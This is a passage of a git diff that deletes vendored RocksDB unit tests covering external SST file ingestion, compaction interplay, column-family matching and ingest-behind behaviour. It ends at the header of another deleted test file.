-    file_keys = {1, 2, 3};
-    ASSERT_OK(GenerateAndAddExternalFile(options, file_keys, 1));
-  });
-
-  // Wait for AddFile to start picking levels and writing MANIFEST
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:0");
-
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:3");
-
-  // We need to verify that no compactions can run while AddFile is
-  // ingesting the files into the levels it find suitable. So we will
-  // wait for 2 seconds to give a chance for compactions to run during
-  // this period, and then make sure that no compactions where able to run
-  env_->SleepForMicroseconds(1000000 * 2);
-  ASSERT_FALSE(bg_compact_started.load());
-
-  // Hold AddFile from finishing writing the MANIFEST
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:1");
-
-  bg_addfile.join();
-  bg_compact.join();
-
-  dbfull()->TEST_WaitForCompact();
-
-  int total_keys = 0;
-  Iterator* iter = db_->NewIterator(ReadOptions());
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    total_keys++;
-  }
-  ASSERT_EQ(total_keys, 10);
-
-  delete iter;
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, CompactDuringAddFileRandom) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  std::function<void()> bg_compact = [&]() {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  };
-
-  int range_id = 0;
-  std::vector<int> file_keys;
-  std::function<void()> bg_addfile = [&]() {
-    ASSERT_OK(GenerateAndAddExternalFile(options, file_keys, range_id));
-  };
-
-  std::vector<port::Thread> threads;
-  while (range_id < 5000) {
-    int range_start = range_id * 10;
-    int range_end = range_start + 10;
-
-    file_keys.clear();
-    for (int k = range_start + 1; k < range_end; k++) {
-      file_keys.push_back(k);
-    }
-    ASSERT_OK(Put(Key(range_start), Key(range_start)));
-    ASSERT_OK(Put(Key(range_end), Key(range_end)));
-    ASSERT_OK(Flush());
-
-    if (range_id % 10 == 0) {
-      threads.emplace_back(bg_compact);
-    }
-    threads.emplace_back(bg_addfile);
-
-    for (auto& t : threads) {
-      t.join();
-    }
-    threads.clear();
-
-    range_id++;
-  }
-
-  for (int rid = 0; rid < 5000; rid++) {
-    int range_start = rid * 10;
-    int range_end = range_start + 10;
-
-    ASSERT_EQ(Get(Key(range_start)), Key(range_start)) << rid;
-    ASSERT_EQ(Get(Key(range_end)), Key(range_end)) << rid;
-    for (int k = range_start + 1; k < range_end; k++) {
-      std::string v = Key(k) + ToString(rid);
-      ASSERT_EQ(Get(Key(k)), v) << rid;
-    }
-  }
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevelDynamic) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-  std::map<std::string, std::string> true_data;
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ExternalSSTFileTest::PickedLevelDynamic:0",
-       "BackgroundCallCompaction:0"},
-      {"DBImpl::BackgroundCompaction:Start",
-       "ExternalSSTFileTest::PickedLevelDynamic:1"},
-      {"ExternalSSTFileTest::PickedLevelDynamic:2",
-       "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Flush 4 files containing the same keys
-  for (int i = 0; i < 4; i++) {
-    for (int k = 20; k <= 30; k++) {
-      ASSERT_OK(Put(Key(k), Key(k) + "put"));
-      true_data[Key(k)] = Key(k) + "put";
-    }
-    for (int k = 50; k <= 60; k++) {
-      ASSERT_OK(Put(Key(k), Key(k) + "put"));
-      true_data[Key(k)] = Key(k) + "put";
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for BackgroundCompaction() to be called
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:0");
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:1");
-
-  // This file overlaps with the output of the compaction (going to L3)
-  // so the file will be added to L0 since L3 is the base level
-  ASSERT_OK(GenerateAndAddExternalFile(options, {31, 32, 33, 34}, -1, false,
-                                       false, &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5");
-
-  // This file does not overlap with the current running compactiong
-  ASSERT_OK(GenerateAndAddExternalFile(options, {9000, 9001}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,0,1");
-
-  // Hold compaction from finishing
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelDynamic:2");
-
-  // Output of the compaction will go to L3
-  dbfull()->TEST_WaitForCompact();
-  EXPECT_EQ(FilesPerLevel(), "1,0,0,2");
-
-  Close();
-  options.disable_auto_compactions = true;
-  Reopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 15, 19}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,3");
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1000, 1001, 1002}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,4");
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {500, 600, 700}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "1,0,0,5");
-
-  // File 5 overlaps with file 2 (L3 / base level)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 10}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "2,0,0,5");
-
-  // File 6 overlaps with file 2 (L3 / base level) and file 5 (L0)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {3, 9}, -1, false, false,
-                                       &true_data));
-  ASSERT_EQ(FilesPerLevel(), "3,0,0,5");
-
-  // Verify data in files
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  // Write range [5 => 10] to L0
-  for (int i = 5; i <= 10; i++) {
-    std::string k = Key(i);
-    std::string v = k + "put";
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-  ASSERT_OK(Flush());
-  ASSERT_EQ(FilesPerLevel(), "4,0,0,5");
-
-  // File 7 overlaps with file 4 (L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {650, 651, 652}, -1, false,
-                                       false, &true_data));
-  ASSERT_EQ(FilesPerLevel(), "5,0,0,5");
-
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, AddExternalSstFileWithCustomCompartor) {
-  Options options = CurrentOptions();
-  options.comparator = ReverseBytewiseComparator();
-  DestroyAndReopen(options);
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // Generate files with these key ranges
-  // {14  -> 0}
-  // {24 -> 10}
-  // {34 -> 20}
-  // {44 -> 30}
-  // ..
-  std::vector<std::string> generated_files;
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = sst_files_dir_ + env_->GenerateUniqueId();
-    ASSERT_OK(sst_file_writer.Open(file_name));
-
-    int range_end = i * 10;
-    int range_start = range_end + 15;
-    for (int k = (range_start - 1); k >= range_end; k--) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k)));
-    }
-    ExternalSstFileInfo file_info;
-    ASSERT_OK(sst_file_writer.Finish(&file_info));
-    generated_files.push_back(file_name);
-  }
-
-  std::vector<std::string> in_files;
-
-  // These 2nd and 3rd files overlap with each other
-  in_files = {generated_files[0], generated_files[4], generated_files[5],
-              generated_files[7]};
-  ASSERT_NOK(DeprecatedAddFile(in_files));
-
-  // These 2 files dont overlap with each other
-  in_files = {generated_files[0], generated_files[2]};
-  ASSERT_OK(DeprecatedAddFile(in_files));
-
-  // These 2 files dont overlap with each other but overlap with keys in DB
-  in_files = {generated_files[3], generated_files[7]};
-  ASSERT_NOK(DeprecatedAddFile(in_files));
-
-  // Files dont overlap and dont overlap with DB key range
-  in_files = {generated_files[4], generated_files[6], generated_files[8]};
-  ASSERT_OK(DeprecatedAddFile(in_files));
-
-  for (int i = 0; i < 100; i++) {
-    if (i % 20 <= 14) {
-      ASSERT_EQ(Get(Key(i)), Key(i));
-    } else {
-      ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-    }
-  }
-}
-
-TEST_F(ExternalSSTFileTest, AddFileTrivialMoveBug) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  options.IncreaseParallelism(20);
-  DestroyAndReopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 4}, 1));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 3}, 2));  // L2
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {10, 14}, 3));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {12, 13}, 4));  // L2
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {20, 24}, 5));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {22, 23}, 6));  // L2
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start", [&](void* arg) {
-        // fit in L3 but will overlap with compaction so will be added
-        // to L2 but a compaction will trivially move it to L3
-        // and break LSM consistency
-        ASSERT_OK(dbfull()->SetOptions({{"max_bytes_for_level_base", "1"}}));
-        ASSERT_OK(GenerateAndAddExternalFile(options, {15, 16}, 7));
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-
-  dbfull()->TEST_WaitForCompact();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, CompactAddedFiles) {
-  Options options = CurrentOptions();
-  options.num_levels = 3;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 10}, 1));  // L3
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 9}, 2));   // L2
-  ASSERT_OK(GenerateAndAddExternalFile(options, {3, 8}, 3));   // L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {4, 7}, 4));   // L0
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-}
-
-TEST_F(ExternalSSTFileTest, SstFileWriterNonSharedKeys) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  std::string file_path = sst_files_dir_ + "/not_shared";
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  std::string suffix(100, 'X');
-  ASSERT_OK(sst_file_writer.Open(file_path));
-  ASSERT_OK(sst_file_writer.Put("A" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("BB" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CC" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CXD" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("CZZZ" + suffix, "VAL"));
-  ASSERT_OK(sst_file_writer.Put("ZAAAX" + suffix, "VAL"));
-
-  ASSERT_OK(sst_file_writer.Finish());
-  ASSERT_OK(DeprecatedAddFile({file_path}));
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoRandomized) {
-  Options options = CurrentOptions();
-  options.IncreaseParallelism(20);
-  options.level0_slowdown_writes_trigger = 256;
-  options.level0_stop_writes_trigger = 256;
-
-  for (int iter = 0; iter < 2; iter++) {
-    bool write_to_memtable = (iter == 0);
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    std::map<std::string, std::string> true_data;
-    for (int i = 0; i < 2000; i++) {
-      std::vector<std::pair<std::string, std::string>> random_data;
-      for (int j = 0; j < 100; j++) {
-        std::string k;
-        std::string v;
-        test::RandomString(&rnd, rnd.Next() % 20, &k);
-        test::RandomString(&rnd, rnd.Next() % 50, &v);
-        random_data.emplace_back(k, v);
-      }
-
-      if (write_to_memtable && rnd.OneIn(4)) {
-        // 25% of writes go through memtable
-        for (auto& entry : random_data) {
-          ASSERT_OK(Put(entry.first, entry.second));
-          true_data[entry.first] = entry.second;
-        }
-      } else {
-        ASSERT_OK(GenerateAndAddExternalFile(options, random_data, -1, true,
-                                             true, &true_data));
-      }
-    }
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    VerifyDBFromMap(true_data, &kcnt, false);
-  }
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoAssignedLevel) {
-  Options options = CurrentOptions();
-  options.num_levels = 5;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-  std::vector<std::pair<std::string, std::string>> file_data;
-  std::map<std::string, std::string> true_data;
-
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-
-  // Insert 0 -> 20 using AddFile
-  file_data.clear();
-  for (int i = 0; i <= 20; i++) {
-    file_data.emplace_back(Key(i), "L4");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file dont overlap with anything in the DB, will go to L4
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel());
-
-  // Insert 80 -> 130 using AddFile
-  file_data.clear();
-  for (int i = 80; i <= 130; i++) {
-    file_data.emplace_back(Key(i), "L0");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file overlap with the memtable, so it will flush it and add
-  // it self to L0
-  ASSERT_EQ("2,0,0,0,1", FilesPerLevel());
-
-  // Insert 30 -> 50 using AddFile
-  file_data.clear();
-  for (int i = 30; i <= 50; i++) {
-    file_data.emplace_back(Key(i), "L4");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file dont overlap with anything in the DB and fit in L4 as well
-  ASSERT_EQ("2,0,0,0,2", FilesPerLevel());
-
-  // Insert 10 -> 40 using AddFile
-  file_data.clear();
-  for (int i = 10; i <= 40; i++) {
-    file_data.emplace_back(Key(i), "L3");
-  }
-  ASSERT_OK(GenerateAndAddExternalFile(options, file_data, -1, true, false,
-                                       &true_data));
-
-  // This file overlap with files in L4, we will ingest it in L3
-  ASSERT_EQ("2,0,0,1,2", FilesPerLevel());
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-
-TEST_F(ExternalSSTFileTest, IngestFileWithGlobalSeqnoMemtableFlush) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  uint64_t entries_in_memtable;
-  std::map<std::string, std::string> true_data;
-
-  for (int k : {10, 20, 40, 80}) {
-    ASSERT_OK(Put(Key(k), "memtable"));
-    true_data[Key(k)] = "memtable";
-  }
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // No need for flush
-  ASSERT_OK(GenerateAndAddExternalFile(options, {90, 100, 110}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // This file will flush the memtable
-  ASSERT_OK(GenerateAndAddExternalFile(options, {19, 20, 21}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_EQ(entries_in_memtable, 0);
-
-  for (int k : {200, 201, 205, 206}) {
-    ASSERT_OK(Put(Key(k), "memtable"));
-    true_data[Key(k)] = "memtable";
-  }
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // No need for flush, this file keys fit between the memtable keys
-  ASSERT_OK(GenerateAndAddExternalFile(options, {202, 203, 204}, -1, true,
-                                       false, &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_GE(entries_in_memtable, 1);
-
-  // This file will flush the memtable
-  ASSERT_OK(GenerateAndAddExternalFile(options, {206, 207}, -1, true, false,
-                                       &true_data));
-  db_->GetIntProperty(DB::Properties::kNumEntriesActiveMemTable,
-                      &entries_in_memtable);
-  ASSERT_EQ(entries_in_memtable, 0);
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-
-TEST_F(ExternalSSTFileTest, L0SortingIssue) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-  std::map<std::string, std::string> true_data;
-
-  ASSERT_OK(Put(Key(1), "memtable"));
-  ASSERT_OK(Put(Key(10), "memtable"));
-
-  // No Flush needed, No global seqno needed, Ingest in L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {7, 8}, -1, true, false));
-  // No Flush needed, but need a global seqno, Ingest in L0
-  ASSERT_OK(GenerateAndAddExternalFile(options, {7, 8}, -1, true, false));
-  printf("%s\n", FilesPerLevel().c_str());
-
-  // Overwrite what we added using external files
-  ASSERT_OK(Put(Key(7), "memtable"));
-  ASSERT_OK(Put(Key(8), "memtable"));
-
-  // Read values from memtable
-  ASSERT_EQ(Get(Key(7)), "memtable");
-  ASSERT_EQ(Get(Key(8)), "memtable");
-
-  // Flush and read from L0
-  ASSERT_OK(Flush());
-  printf("%s\n", FilesPerLevel().c_str());
-  ASSERT_EQ(Get(Key(7)), "memtable");
-  ASSERT_EQ(Get(Key(8)), "memtable");
-}
-
-TEST_F(ExternalSSTFileTest, CompactionDeadlock) {
-  Options options = CurrentOptions();
-  options.num_levels = 2;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 4;
-  DestroyAndReopen(options);
-
-  // atomic conter of currently running bg threads
-  std::atomic<int> running_threads(0);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBImpl::DelayWrite:Wait", "ExternalSSTFileTest::DeadLock:0"},
-      {"ExternalSSTFileTest::DeadLock:1", "DBImpl::AddFile:Start"},
-      {"DBImpl::AddFile:MutexLock", "ExternalSSTFileTest::DeadLock:2"},
-      {"ExternalSSTFileTest::DeadLock:3", "BackgroundCallCompaction:0"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start ingesting and extrnal file in the background
-  rocksdb::port::Thread bg_ingest_file([&]() {
-    running_threads += 1;
-    ASSERT_OK(GenerateAndAddExternalFile(options, {5, 6}));
-    running_threads -= 1;
-  });
-
-  ASSERT_OK(Put(Key(1), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(2), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(3), "memtable"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put(Key(4), "memtable"));
-  ASSERT_OK(Flush());
-
-  // This thread will try to insert into the memtable but since we have 4 L0
-  // files this thread will be blocked and hold the writer thread
-  rocksdb::port::Thread bg_block_put([&]() {
-    running_threads += 1;
-    ASSERT_OK(Put(Key(10), "memtable"));
-    running_threads -= 1;
-  });
-
-  // Make sure DelayWrite is called first
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:0");
-
-  // `DBImpl::AddFile:Start` will wait until we be here
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:1");
-
-  // Wait for IngestExternalFile() to start and aquire mutex
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:2");
-
-  // Now let compaction start
-  TEST_SYNC_POINT("ExternalSSTFileTest::DeadLock:3");
-
-  // Wait for max 5 seconds, if we did not finish all bg threads
-  // then we hit the deadlock bug
-  for (int i = 0; i < 10; i++) {
-    if (running_threads.load() == 0) {
-      break;
-    }
-    env_->SleepForMicroseconds(500000);
-  }
-
-  ASSERT_EQ(running_threads.load(), 0);
-
-  bg_ingest_file.join();
-  bg_block_put.join();
-}
-
-TEST_F(ExternalSSTFileTest, DirtyExit) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  std::string file_path = sst_files_dir_ + "/dirty_exit";
-  std::unique_ptr<SstFileWriter> sst_file_writer;
-
-  // Destruct SstFileWriter without calling Finish()
-  sst_file_writer.reset(new SstFileWriter(EnvOptions(), options));
-  ASSERT_OK(sst_file_writer->Open(file_path));
-  sst_file_writer.reset();
-
-  // Destruct SstFileWriter with a failing Finish
-  sst_file_writer.reset(new SstFileWriter(EnvOptions(), options));
-  ASSERT_OK(sst_file_writer->Open(file_path));
-  ASSERT_NOK(sst_file_writer->Finish());
-}
-
-TEST_F(ExternalSSTFileTest, FileWithCFInfo) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"koko", "toto"}, options);
-
-  SstFileWriter sfw_default(EnvOptions(), options, handles_[0]);
-  SstFileWriter sfw_cf1(EnvOptions(), options, handles_[1]);
-  SstFileWriter sfw_cf2(EnvOptions(), options, handles_[2]);
-  SstFileWriter sfw_unknown(EnvOptions(), options);
-
-  // default_cf.sst
-  const std::string cf_default_sst = sst_files_dir_ + "/default_cf.sst";
-  ASSERT_OK(sfw_default.Open(cf_default_sst));
-  ASSERT_OK(sfw_default.Put("K1", "V1"));
-  ASSERT_OK(sfw_default.Put("K2", "V2"));
-  ASSERT_OK(sfw_default.Finish());
-
-  // cf1.sst
-  const std::string cf1_sst = sst_files_dir_ + "/cf1.sst";
-  ASSERT_OK(sfw_cf1.Open(cf1_sst));
-  ASSERT_OK(sfw_cf1.Put("K3", "V1"));
-  ASSERT_OK(sfw_cf1.Put("K4", "V2"));
-  ASSERT_OK(sfw_cf1.Finish());
-
-  // cf_unknown.sst
-  const std::string unknown_sst = sst_files_dir_ + "/cf_unknown.sst";
-  ASSERT_OK(sfw_unknown.Open(unknown_sst));
-  ASSERT_OK(sfw_unknown.Put("K5", "V1"));
-  ASSERT_OK(sfw_unknown.Put("K6", "V2"));
-  ASSERT_OK(sfw_unknown.Finish());
-
-  IngestExternalFileOptions ifo;
-
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[0], {cf1_sst}, ifo));
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[2], {cf1_sst}, ifo));
-  // SST CF match
-  ASSERT_OK(db_->IngestExternalFile(handles_[1], {cf1_sst}, ifo));
-
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[1], {cf_default_sst}, ifo));
-  // SST CF dont match
-  ASSERT_NOK(db_->IngestExternalFile(handles_[2], {cf_default_sst}, ifo));
-  // SST CF match
-  ASSERT_OK(db_->IngestExternalFile(handles_[0], {cf_default_sst}, ifo));
-
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[1], {unknown_sst}, ifo));
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[2], {unknown_sst}, ifo));
-  // SST CF unknown
-  ASSERT_OK(db_->IngestExternalFile(handles_[0], {unknown_sst}, ifo));
-
-  // Cannot ingest a file into a dropped CF
-  ASSERT_OK(db_->DropColumnFamily(handles_[1]));
-  ASSERT_NOK(db_->IngestExternalFile(handles_[1], {unknown_sst}, ifo));
-
-  // CF was not dropped, ok to Ingest
-  ASSERT_OK(db_->IngestExternalFile(handles_[2], {unknown_sst}, ifo));
-}
-
-class TestIngestExternalFileListener : public EventListener {
- public:
-  void OnExternalFileIngested(DB* db,
-                              const ExternalFileIngestionInfo& info) override {
-    ingested_files.push_back(info);
-  }
-
-  std::vector<ExternalFileIngestionInfo> ingested_files;
-};
-
-TEST_F(ExternalSSTFileTest, IngestionListener) {
-  Options options = CurrentOptions();
-  TestIngestExternalFileListener* listener =
-      new TestIngestExternalFileListener();
-  options.listeners.emplace_back(listener);
-  CreateAndReopenWithCF({"koko", "toto"}, options);
-
-  // Ingest into default cf
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[0]));
-  ASSERT_EQ(listener->ingested_files.size(), 1);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "default");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "default");
-
-  // Ingest into cf1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[1]));
-  ASSERT_EQ(listener->ingested_files.size(), 2);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "koko");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            1);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "koko");
-
-  // Ingest into cf2
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2}, -1, true, true, nullptr,
-                                       handles_[2]));
-  ASSERT_EQ(listener->ingested_files.size(), 3);
-  ASSERT_EQ(listener->ingested_files.back().cf_name, "toto");
-  ASSERT_EQ(listener->ingested_files.back().global_seqno, 0);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_id,
-            2);
-  ASSERT_EQ(listener->ingested_files.back().table_properties.column_family_name,
-            "toto");
-}
-
-TEST_F(ExternalSSTFileTest, SnapshotInconsistencyBug) {
-  Options options = CurrentOptions();
-  DestroyAndReopen(options);
-  const int kNumKeys = 10000;
-
-  // Insert keys using normal path and take a snapshot
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(Put(Key(i), Key(i) + "_V1"));
-  }
-  const Snapshot* snap = db_->GetSnapshot();
-
-  // Overwrite all keys using IngestExternalFile
-  std::string sst_file_path = sst_files_dir_ + "file1.sst";
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-  ASSERT_OK(sst_file_writer.Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(sst_file_writer.Put(Key(i), Key(i) + "_V2"));
-  }
-  ASSERT_OK(sst_file_writer.Finish());
-
-  IngestExternalFileOptions ifo;
-  ifo.move_files = true;
-  ASSERT_OK(db_->IngestExternalFile({sst_file_path}, ifo));
-
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_EQ(Get(Key(i), snap), Key(i) + "_V1");
-    ASSERT_EQ(Get(Key(i)), Key(i) + "_V2");
-  }
-
-  db_->ReleaseSnapshot(snap);
-}
-
-TEST_F(ExternalSSTFileTest, IngestBehind) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 3;
-  options.disable_auto_compactions = false;
-  DestroyAndReopen(options);
-  std::vector<std::pair<std::string, std::string>> file_data;
-  std::map<std::string, std::string> true_data;
-
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-
-  // Insert 100 -> 200 using IngestExternalFile
-  file_data.clear();
-  for (int i = 0; i <= 20; i++) {
-    file_data.emplace_back(Key(i), "ingest_behind");
-  }
-
-  IngestExternalFileOptions ifo;
-  ifo.allow_global_seqno = true;
-  ifo.ingest_behind = true;
-
-  // Can't ingest behind since allow_ingest_behind isn't set to true
-  ASSERT_NOK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-
-  options.allow_ingest_behind = true;
-  // check that we still can open the DB, as num_levels should be
-  // sanitized to 3
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  options.num_levels = 3;
-  DestroyAndReopen(options);
-  // Insert 100 -> 200 into the memtable
-  for (int i = 100; i <= 200; i++) {
-    ASSERT_OK(Put(Key(i), "memtable"));
-    true_data[Key(i)] = "memtable";
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // Universal picker should go at second from the bottom level
-  ASSERT_EQ("0,1", FilesPerLevel());
-  ASSERT_OK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-  ASSERT_EQ("0,1,1", FilesPerLevel());
-  // this time ingest should fail as the file doesn't fit to the bottom level
-  ASSERT_NOK(GenerateAndAddExternalFileIngestBehind(options, ifo,
-                                                   file_data, -1, false,
-                                                   &true_data));
-  ASSERT_EQ("0,1,1", FilesPerLevel());
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  // bottom level should be empty
-  ASSERT_EQ("0,1", FilesPerLevel());
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as External SST File Writer and Ingestion are not supported "
-          "in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/fault_injection_test.cc b/thirdparty/rocksdb/db/fault_injection_test.cc
deleted file mode 100644
index adfcb4d..0000000
--- a/thirdparty/rocksdb/db/fault_injection_test.cc
+++ /dev/null
@@ -1,547 +0,0 @@
